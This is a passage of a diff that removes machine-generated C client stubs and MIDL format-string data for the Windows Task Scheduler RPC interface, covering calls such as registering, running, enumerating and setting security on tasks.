)&DefaultIfName_StubDesc, - (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[0], - IDL_handle, - arg_1); - return ( long )_RetVal.Simple; - -} - - -long _SchRpcRegisterTask( - /* [in] */ handle_t IDL_handle, - /* [string][unique][in] */ wchar_t *arg_1, - /* [string][in] */ wchar_t *arg_2, - /* [in] */ long arg_3, - /* [string][unique][in] */ wchar_t *arg_4, - /* [in] */ long arg_5, - /* [in] */ long arg_6, - /* [size_is][unique][in] */ struct Struct_18_t *arg_7, - /* [string][ref][out] */ wchar_t **arg_8, - /* [ref][out] */ struct Struct_74_t **arg_9) -{ - - CLIENT_CALL_RETURN _RetVal; - - _RetVal = NdrClientCall2( - ( PMIDL_STUB_DESC )&DefaultIfName_StubDesc, - (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[42], - IDL_handle, - arg_1, - arg_2, - arg_3, - arg_4, - arg_5, - arg_6, - arg_7, - arg_8, - arg_9); - return ( long )_RetVal.Simple; - -} - - -long SchRpcRetrieveTask( - /* [in] */ handle_t IDL_handle, - /* [string][in] */ wchar_t *arg_1, - /* [string][in] */ wchar_t *arg_2, - /* [in] */ long *arg_3, - /* [string][ref][out] */ wchar_t **arg_4) -{ - - CLIENT_CALL_RETURN _RetVal; - - _RetVal = NdrClientCall2( - ( PMIDL_STUB_DESC )&DefaultIfName_StubDesc, - (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[132], - IDL_handle, - arg_1, - arg_2, - arg_3, - arg_4); - return ( long )_RetVal.Simple; - -} - - -long _SchRpcCreateFolder( - /* [in] */ handle_t IDL_handle, - /* [string][in] */ wchar_t *arg_1, - /* [string][unique][in] */ wchar_t *arg_2, - /* [in] */ long arg_3) -{ - - CLIENT_CALL_RETURN _RetVal; - - _RetVal = NdrClientCall2( - ( PMIDL_STUB_DESC )&DefaultIfName_StubDesc, - (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[192], - IDL_handle, - arg_1, - arg_2, - arg_3); - return ( long )_RetVal.Simple; - -} - - -long _SchRpcSetSecurity( - /* [in] */ handle_t IDL_handle, - /* [string][in] */ wchar_t *arg_1, - /* [string][in] */ wchar_t *arg_2, - /* [in] */ long arg_3) -{ - - CLIENT_CALL_RETURN _RetVal; - - _RetVal = NdrClientCall2( - ( PMIDL_STUB_DESC )&DefaultIfName_StubDesc, - (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[246], - IDL_handle, - arg_1, - arg_2, - arg_3); - return ( long )_RetVal.Simple; - -} - - -long _SchRpcGetSecurity( - /* [in] */ handle_t IDL_handle, - /* [string][in] */ wchar_t *arg_1, - /* [in] */ long arg_2, - /* [string][ref][out] */ wchar_t **arg_3) -{ - - CLIENT_CALL_RETURN _RetVal; - - _RetVal = NdrClientCall2( - ( PMIDL_STUB_DESC )&DefaultIfName_StubDesc, - (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[300], - IDL_handle, - arg_1, - arg_2, - arg_3); - return ( long )_RetVal.Simple; - -} - - -long _SchRpcEnumFolders( - /* [in] */ handle_t IDL_handle, - /* [string][in] */ wchar_t *arg_1, - /* [in] */ long arg_2, - /* [out][in] */ long *arg_3, - /* [in] */ long arg_4, - /* [out] */ long *arg_5, - /* [string][size_is][size_is][ref][out] */ wchar_t ***arg_6) -{ - - CLIENT_CALL_RETURN _RetVal; - - _RetVal = NdrClientCall2( - ( PMIDL_STUB_DESC )&DefaultIfName_StubDesc, - (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[354], - IDL_handle, - arg_1, - arg_2, - arg_3, - arg_4, - arg_5, - arg_6); - return ( long )_RetVal.Simple; - -} - - -long _SchRpcEnumTasks( - /* [in] */ handle_t IDL_handle, - /* [string][in] */ wchar_t *arg_1, - /* [in] */ long arg_2, - /* [out][in] */ long *arg_3, - /* [in] */ long arg_4, - /* [out] */ long *arg_5, - /* [string][size_is][size_is][ref][out] */ wchar_t ***arg_6) -{ - - CLIENT_CALL_RETURN _RetVal; - - _RetVal = NdrClientCall2( - ( PMIDL_STUB_DESC )&DefaultIfName_StubDesc, - (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[426], - IDL_handle, - arg_1, - arg_2, - arg_3, - arg_4, - arg_5, - arg_6); - return ( long )_RetVal.Simple; - -} - - -long _SchRpcEnumInstances( - /* [in] */ handle_t IDL_handle, - /* [string][unique][in] */ wchar_t *arg_1, - /* [in] */ long arg_2, - /* [out] */ long *arg_3, - /* [size_is][size_is][ref][out] */ struct Struct_144_t **arg_4) -{ - - CLIENT_CALL_RETURN _RetVal; - - _RetVal = NdrClientCall2( - ( PMIDL_STUB_DESC )&DefaultIfName_StubDesc, - (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[498], - IDL_handle, - arg_1, - arg_2, - arg_3, - arg_4); - return ( long )_RetVal.Simple; - -} - - -long _SchRpcGetInstanceInfo( - /* [in] */ handle_t IDL_handle, - /* [in] */ struct Struct_144_t *arg_1, - /* [string][ref][out] */ wchar_t **arg_2, - /* [out] */ long *arg_3, - /* [string][ref][out] */ wchar_t **arg_4, - /* [string][ref][out] */ wchar_t **arg_5, - /* [out] */ long *arg_6, - /* [size_is][size_is][ref][out] */ struct Struct_144_t **arg_7, - /* [out] */ long *arg_8) -{ - - CLIENT_CALL_RETURN _RetVal; - - _RetVal = NdrClientCall2( - ( PMIDL_STUB_DESC )&DefaultIfName_StubDesc, - (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[558], - IDL_handle, - arg_1, - arg_2, - arg_3, - arg_4, - arg_5, - arg_6, - arg_7, - arg_8); - return ( long )_RetVal.Simple; - -} - - -long _SchRpcStopInstance( - /* [in] */ handle_t IDL_handle, - /* [in] */ struct Struct_144_t *arg_1, - /* [in] */ long arg_2) -{ - - CLIENT_CALL_RETURN _RetVal; - - _RetVal = NdrClientCall2( - ( PMIDL_STUB_DESC )&DefaultIfName_StubDesc, - (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[642], - IDL_handle, - arg_1, - arg_2); - return ( long )_RetVal.Simple; - -} - - -long _SchRpcStop( - /* [in] */ handle_t IDL_handle, - /* [string][unique][in] */ wchar_t *arg_1, - /* [in] */ long arg_2) -{ - - CLIENT_CALL_RETURN _RetVal; - - _RetVal = NdrClientCall2( - ( PMIDL_STUB_DESC )&DefaultIfName_StubDesc, - (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[690], - IDL_handle, - arg_1, - arg_2); - return ( long )_RetVal.Simple; - -} - - -long _SchRpcRun( - /* [in] */ handle_t IDL_handle, - /* [string][in] */ wchar_t *arg_1, - /* [in] */ long arg_2, - /* [string][size_is][unique][in] */ wchar_t **arg_3, - /* [in] */ long arg_4, - /* [in] */ long arg_5, - /* [string][unique][in] */ wchar_t *arg_6, - /* [out] */ struct Struct_144_t *arg_7) -{ - - CLIENT_CALL_RETURN _RetVal; - - _RetVal = NdrClientCall2( - ( PMIDL_STUB_DESC )&DefaultIfName_StubDesc, - (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[738], - IDL_handle, - arg_1, - arg_2, - arg_3, - arg_4, - arg_5, - arg_6, - arg_7); - return ( long )_RetVal.Simple; - -} - - -long _SchRpcDelete( - /* [in] */ handle_t IDL_handle, - /* [string][in] */ wchar_t *arg_1, - /* [in] */ long arg_2) -{ - - CLIENT_CALL_RETURN _RetVal; - - _RetVal = NdrClientCall2( - ( PMIDL_STUB_DESC )&DefaultIfName_StubDesc, - (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[816], - IDL_handle, - arg_1, - arg_2); - return ( long )_RetVal.Simple; - -} - - -long _SchRpcRename( - /* [in] */ handle_t IDL_handle, - /* [string][in] */ wchar_t *arg_1, - /* [string][in] */ wchar_t *arg_2, - /* [in] */ long arg_3) -{ - - CLIENT_CALL_RETURN _RetVal; - - _RetVal = NdrClientCall2( - ( PMIDL_STUB_DESC )&DefaultIfName_StubDesc, - (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[864], - IDL_handle, - arg_1, - arg_2, - arg_3); - return ( long )_RetVal.Simple; - -} - - -long _SchRpcScheduledRuntimes( - /* [in] */ handle_t IDL_handle, - /* [string][in] */ wchar_t *arg_1, - /* [unique][in] */ struct Struct_246_t *arg_2, - /* [unique][in] */ struct Struct_246_t *arg_3, - /* [in] */ long arg_4, - /* [in] */ long arg_5, - /* [out] */ long *arg_6, - /* [size_is][size_is][ref][out] */ struct Struct_246_t **arg_7) -{ - - CLIENT_CALL_RETURN _RetVal; - - _RetVal = NdrClientCall2( - ( PMIDL_STUB_DESC )&DefaultIfName_StubDesc, - (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[918], - IDL_handle, - arg_1, - arg_2, - arg_3, - arg_4, - arg_5, - arg_6, - arg_7); - return ( long )_RetVal.Simple; - -} - - -long _SchRpcGetLastRunInfo( - /* [in] */ handle_t IDL_handle, - /* [string][in] */ wchar_t *arg_1, - /* [out] */ struct Struct_246_t *arg_2, - /* [out] */ long *arg_3) -{ - - CLIENT_CALL_RETURN _RetVal; - - _RetVal = NdrClientCall2( - ( PMIDL_STUB_DESC )&DefaultIfName_StubDesc, - (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[996], - IDL_handle, - arg_1, - arg_2, - arg_3); - return ( long )_RetVal.Simple; - -} - - -long _SchRpcGetTaskInfo( - /* [in] */ handle_t IDL_handle, - /* [string][in] */ wchar_t *arg_1, - /* [in] */ long arg_2, - /* [out] */ long *arg_3, - /* [out] */ long *arg_4) -{ - - CLIENT_CALL_RETURN _RetVal; - - _RetVal = NdrClientCall2( - ( PMIDL_STUB_DESC )&DefaultIfName_StubDesc, - (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[1050], - IDL_handle, - arg_1, - arg_2, - arg_3, - arg_4); - return ( long )_RetVal.Simple; - -} - - -long _SchRpcGetNumberOfMissedRuns( - /* [in] */ handle_t IDL_handle, - /* [string][in] */ wchar_t *arg_1, - /* [out] */ long *arg_2) -{ - - CLIENT_CALL_RETURN _RetVal; - - _RetVal = NdrClientCall2( - ( PMIDL_STUB_DESC )&DefaultIfName_StubDesc, - (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[1110], - IDL_handle, - arg_1, - arg_2); - return ( long )_RetVal.Simple; - -} - - -long _SchRpcEnableTask( - /* [in] */ handle_t IDL_handle, - /* [string][in] */ wchar_t *arg_1, - /* [in] */ long arg_2) -{ - - CLIENT_CALL_RETURN _RetVal; - - _RetVal = NdrClientCall2( - ( PMIDL_STUB_DESC )&DefaultIfName_StubDesc, - (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[1158], - IDL_handle, - arg_1, - arg_2); - return ( long )_RetVal.Simple; - -} - - -#if !defined(__RPC_WIN64__) -#error Invalid build platform for this stub. -#endif - -static const rpc_MIDL_PROC_FORMAT_STRING rpc__MIDL_ProcFormatString = - { - 0, - { - - /* Procedure _SchRpcHighestVersion */ - - 0x0, /* 0 */ - 0x48, /* Old Flags: */ -/* 2 */ NdrFcLong( 0x0 ), /* 0 */ -/* 6 */ NdrFcShort( 0x0 ), /* 0 */ -/* 8 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ -/* 10 */ 0x32, /* FC_BIND_PRIMITIVE */ - 0x0, /* 0 */ -/* 12 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ -/* 14 */ NdrFcShort( 0x0 ), /* 0 */ -/* 16 */ NdrFcShort( 0x24 ), /* 36 */ -/* 18 */ 0x44, /* Oi2 Flags: has return, has ext, */ - 0x2, /* 2 */ -/* 20 */ 0xa, /* 10 */ - 0x1, /* Ext Flags: new corr desc, */ -/* 22 */ NdrFcShort( 0x0 ), /* 0 */ -/* 24 */ NdrFcShort( 0x0 ), /* 0 */ -/* 26 */ NdrFcShort( 0x0 ), /* 0 */ -/* 28 */ NdrFcShort( 0x0 ), /* 0 */ - - /* Parameter IDL_handle */ - -/* 30 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ -/* 32 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ -/* 34 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_1 */ - -/* 36 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ -/* 38 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ -/* 40 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Procedure _SchRpcRegisterTask */ - - - /* Return value */ - -/* 42 */ 0x0, /* 0 */ - 0x48, /* Old Flags: */ -/* 44 */ NdrFcLong( 0x0 ), /* 0 */ -/* 48 */ NdrFcShort( 0x1 ), /* 1 */ -/* 50 */ NdrFcShort( 0x58 ), /* X64 Stack size/offset = 88 */ -/* 52 */ 0x32, /* FC_BIND_PRIMITIVE */ - 0x0, /* 0 */ -/* 54 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ -/* 56 */ NdrFcShort( 0x18 ), /* 24 */ -/* 58 */ NdrFcShort( 0x8 ), /* 8 */ -/* 60 */ 0x47, /* Oi2 Flags: srv must size, clt must size, has return, has ext, */ - 0xa, /* 10 */ -/* 62 */ 0xa, /* 10 */ - 0x5, /* Ext Flags: new corr desc, srv corr check, */ -/* 64 */ NdrFcShort( 0x0 ), /* 0 */ -/* 66 */ NdrFcShort( 0x1 ), /* 1 */ -/* 68 */ NdrFcShort( 0x0 ), /* 0 */ -/* 70 */ NdrFcShort( 0x0 ), /* 0 */ - - /* Parameter IDL_handle */ - -/* 72 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ -/* 74 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ -/* 76 */ NdrFcShort( 0x6 ), /* Type Offset=6 */ - - /* Parameter arg_1 */ - -/* 78 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ -/* 80 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ -/* 82 */ NdrFcShort( 0xc ), /* Type Offset=12 */ - - /* Parameter arg_2 */ - -/* 84 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ -/* 86 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ -/* 88 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_3 */ - -/* 90 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ -/* 92 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ -/* 94 */ NdrFcShort( 0x6 ), /* Type Offset=6 */ - - /* Parameter arg_4 */ - -/* 96 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ -/* 98 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ -/* 100 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_5 */ - -/* 102 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ -/* 104 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ -/* 106 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_6 */ - -/* 108 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ -/* 110 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */ -/* 112 */ NdrFcShort( 0xe ), /* Type Offset=14 */ - - /* Parameter arg_7 */ - -/* 114 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ -/* 116 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */ -/* 118 */ NdrFcShort( 0x3e ), /* Type Offset=62 */ - - /* Parameter arg_8 */ - -/* 120 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ -/* 122 */ NdrFcShort( 0x48 ), /* X64 Stack size/offset = 72 */ -/* 124 */ NdrFcShort( 0x42 ), /* Type Offset=66 */ - - /* Parameter arg_9 */ - -/* 126 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ -/* 128 */ NdrFcShort( 0x50 ), /* X64 Stack size/offset = 80 */ -/* 130 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Procedure SchRpcRetrieveTask */ - - - /* Return value */ - -/* 132 */ 0x0, /* 0 */ - 0x48, /* Old Flags: */ -/* 134 */ NdrFcLong( 0x0 ), /* 0 */ -/* 138 */ NdrFcShort( 0x2 ), /* 2 */ -/* 140 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ -/* 142 */ 0x32, /* FC_BIND_PRIMITIVE */ - 0x0, /* 0 */ -/* 144 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ -/* 146 */ NdrFcShort( 0x1c ), /* 28 */ -/* 148 */ NdrFcShort( 0x8 ), /* 8 */ -/* 150 */ 0x47, /* Oi2 Flags: srv must size, clt must size, has return, has ext, */ - 0x5, /* 5 */ -/* 152 */ 0xa, /* 10 */ - 0x1, /* Ext Flags: new corr desc, */ -/* 154 */ NdrFcShort( 0x0 ), /* 0 */ -/* 156 */ NdrFcShort( 0x0 ), /* 0 */ -/* 158 */ NdrFcShort( 0x0 ), /* 0 */ -/* 160 */ NdrFcShort( 0x0 ), /* 0 */ - - /* Parameter IDL_handle */ - -/* 162 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ -/* 164 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ -/* 166 */ NdrFcShort( 0xc ), /* Type Offset=12 */ - - /* Parameter arg_1 */ - -/* 168 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ -/* 170 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ -/* 172 */ NdrFcShort( 0xc ), /* Type Offset=12 */ - - /* Parameter arg_2 */ - -/* 174 */ NdrFcShort( 0x148 ), /* Flags: in, base type, simple ref, */ -/* 176 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ -/* 178 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_3 */ - -/* 180 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ -/* 182 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ -/* 184 */ NdrFcShort( 0x3e ), /* Type Offset=62 */ - - /* Parameter arg_4 */ - -/* 186 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ -/* 188 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ -/* 190 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Procedure _SchRpcCreateFolder */ - - - /* Return value */ - -/* 192 */ 0x0, /* 0 */ - 0x48, /* Old Flags: */ -/* 194 */ NdrFcLong( 0x0 ), /* 0 */ -/* 198 */ NdrFcShort( 0x3 ), /* 3 */ -/* 200 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ -/* 202 */ 0x32, /* FC_BIND_PRIMITIVE */ - 0x0, /* 0 */ -/* 204 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ -/* 206 */ NdrFcShort( 0x8 ), /* 8 */ -/* 208 */ NdrFcShort( 0x8 ), /* 8 */ -/* 210 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ - 0x4, /* 4 */ -/* 212 */ 0xa, /* 10 */ - 0x1, /* Ext Flags: new corr desc, */ -/* 214 */ NdrFcShort( 0x0 ), /* 0 */ -/* 216 */ NdrFcShort( 0x0 ), /* 0 */ -/* 218 */ NdrFcShort( 0x0 ), /* 0 */ -/* 220 */ NdrFcShort( 0x0 ), /* 0 */ - - /* Parameter IDL_handle */ - -/* 222 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ -/* 224 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ -/* 226 */ NdrFcShort( 0xc ), /* Type Offset=12 */ - - /* Parameter arg_1 */ - -/* 228 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ -/* 230 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ -/* 232 */ NdrFcShort( 0x6 ), /* Type Offset=6 */ - - /* Parameter arg_2 */ - -/* 234 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ -/* 236 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ -/* 238 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_3 */ - -/* 240 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ -/* 242 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ -/* 244 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Procedure _SchRpcSetSecurity */ - - - /* Return value */ - -/* 246 */ 0x0, /* 0 */ - 0x48, /* Old Flags: */ -/* 248 */ NdrFcLong( 0x0 ), /* 0 */ -/* 252 */ NdrFcShort( 0x4 ), /* 4 */ -/* 254 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ -/* 256 */ 0x32, /* FC_BIND_PRIMITIVE */ - 0x0, /* 0 */ -/* 258 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ -/* 260 */ NdrFcShort( 0x8 ), /* 8 */ -/* 262 */ NdrFcShort( 0x8 ), /* 8 */ -/* 264 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ - 0x4, /* 4 */ -/* 266 */ 0xa, /* 10 */ - 0x1, /* Ext Flags: new corr desc, */ -/* 268 */ NdrFcShort( 0x0 ), /* 0 */ -/* 270 */ NdrFcShort( 0x0 ), /* 0 */ -/* 272 */ NdrFcShort( 0x0 ), /* 0 */ -/* 274 */ NdrFcShort( 0x0 ), /* 0 */ - - /* Parameter IDL_handle */ - -/* 276 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ -/* 278 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ -/* 280 */ NdrFcShort( 0xc ), /* Type Offset=12 */ - - /* Parameter arg_1 */ - -/* 282 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ -/* 284 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ -/* 286 */ NdrFcShort( 0xc ), /* Type Offset=12 */ - - /* Parameter arg_2 */ - -/* 288 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ -/* 290 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ -/* 292 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_3 */ - -/* 294 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ -/* 296 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ -/* 298 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Procedure _SchRpcGetSecurity */ - - - /* Return value */ - -/* 300 */ 0x0, /* 0 */ - 0x48, /* Old Flags: */ -/* 302 */ NdrFcLong( 0x0 ), /* 0 */ -/* 306 */ NdrFcShort( 0x5 ), /* 5 */ -/* 308 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ -/* 310 */ 0x32, /* FC_BIND_PRIMITIVE */ - 0x0, /* 0 */ -/* 312 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ -/* 314 */ NdrFcShort( 0x8 ), /* 8 */ -/* 316 */ NdrFcShort( 0x8 ), /* 8 */ -/* 318 */ 0x47, /* Oi2 Flags: srv must size, clt must size, has return, has ext, */ - 0x4, /* 4 */ -/* 320 */ 0xa, /* 10 */ - 0x1, /* Ext Flags: new corr desc, */ -/* 322 */ NdrFcShort( 0x0 ), /* 0 */ -/* 324 */ NdrFcShort( 0x0 ), /* 0 */ -/* 326 */ NdrFcShort( 0x0 ), /* 0 */ -/* 328 */ NdrFcShort( 0x0 ), /* 0 */ - - /* Parameter IDL_handle */ - -/* 330 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ -/* 332 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ -/* 334 */ NdrFcShort( 0xc ), /* Type Offset=12 */ - - /* Parameter arg_1 */ - -/* 336 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ -/* 338 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ -/* 340 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_2 */ - -/* 342 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ -/* 344 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ -/* 346 */ NdrFcShort( 0x3e ), /* Type Offset=62 */ - - /* Parameter arg_3 */ - -/* 348 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ -/* 350 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ -/* 352 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Procedure _SchRpcEnumFolders */ - - - /* Return value */ - -/* 354 */ 0x0, /* 0 */ - 0x48, /* Old Flags: */ -/* 356 */ NdrFcLong( 0x0 ), /* 0 */ -/* 360 */ NdrFcShort( 0x6 ), /* 6 */ -/* 362 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */ -/* 364 */ 0x32, /* FC_BIND_PRIMITIVE */ - 0x0, /* 0 */ -/* 366 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ -/* 368 */ NdrFcShort( 0x2c ), /* 44 */ -/* 370 */ NdrFcShort( 0x40 ), /* 64 */ -/* 372 */ 0x47, /* Oi2 Flags: srv must size, clt must size, has return, has ext, */ - 0x7, /* 7 */ -/* 374 */ 0xa, /* 10 */ - 0x3, /* Ext Flags: new corr desc, clt corr check, */ -/* 376 */ NdrFcShort( 0x1 ), /* 1 */ -/* 378 */ NdrFcShort( 0x0 ), /* 0 */ -/* 380 */ NdrFcShort( 0x0 ), /* 0 */ -/* 382 */ NdrFcShort( 0x0 ), /* 0 */ - - /* Parameter IDL_handle */ - -/* 384 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ -/* 386 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ -/* 388 */ NdrFcShort( 0xc ), /* Type Offset=12 */ - - /* Parameter arg_1 */ - -/* 390 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ -/* 392 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ -/* 394 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_2 */ - -/* 396 */ NdrFcShort( 0x158 ), /* Flags: in, out, base type, simple ref, */ -/* 398 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ -/* 400 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_3 */ - -/* 402 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ -/* 404 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ -/* 406 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_4 */ - -/* 408 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ -/* 410 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ -/* 412 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_5 */ - -/* 414 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ -/* 416 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ -/* 418 */ NdrFcShort( 0x64 ), /* Type Offset=100 */ - - /* Parameter arg_6 */ - -/* 420 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ -/* 422 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */ -/* 424 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Procedure _SchRpcEnumTasks */ - - - /* Return value */ - -/* 426 */ 0x0, /* 0 */ - 0x48, /* Old Flags: */ -/* 428 */ NdrFcLong( 0x0 ), /* 0 */ -/* 432 */ NdrFcShort( 0x7 ), /* 7 */ -/* 434 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */ -/* 436 */ 0x32, /* FC_BIND_PRIMITIVE */ - 0x0, /* 0 */ -/* 438 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ -/* 440 */ NdrFcShort( 0x2c ), /* 44 */ -/* 442 */ NdrFcShort( 0x40 ), /* 64 */ -/* 444 */ 0x47, /* Oi2 Flags: srv must size, clt must size, has return, has ext, */ - 0x7, /* 7 */ -/* 446 */ 0xa, /* 10 */ - 0x3, /* Ext Flags: new corr desc, clt corr check, */ -/* 448 */ NdrFcShort( 0x1 ), /* 1 */ -/* 450 */ NdrFcShort( 0x0 ), /* 0 */ -/* 452 */ NdrFcShort( 0x0 ), /* 0 */ -/* 454 */ NdrFcShort( 0x0 ), /* 0 */ - - /* Parameter IDL_handle */ - -/* 456 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ -/* 458 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ -/* 460 */ NdrFcShort( 0xc ), /* Type Offset=12 */ - - /* Parameter arg_1 */ - -/* 462 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ -/* 464 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ -/* 466 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_2 */ - -/* 468 */ NdrFcShort( 0x158 ), /* Flags: in, out, base type, simple ref, */ -/* 470 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ -/* 472 */ 0x8, /* FC_LONG */ - 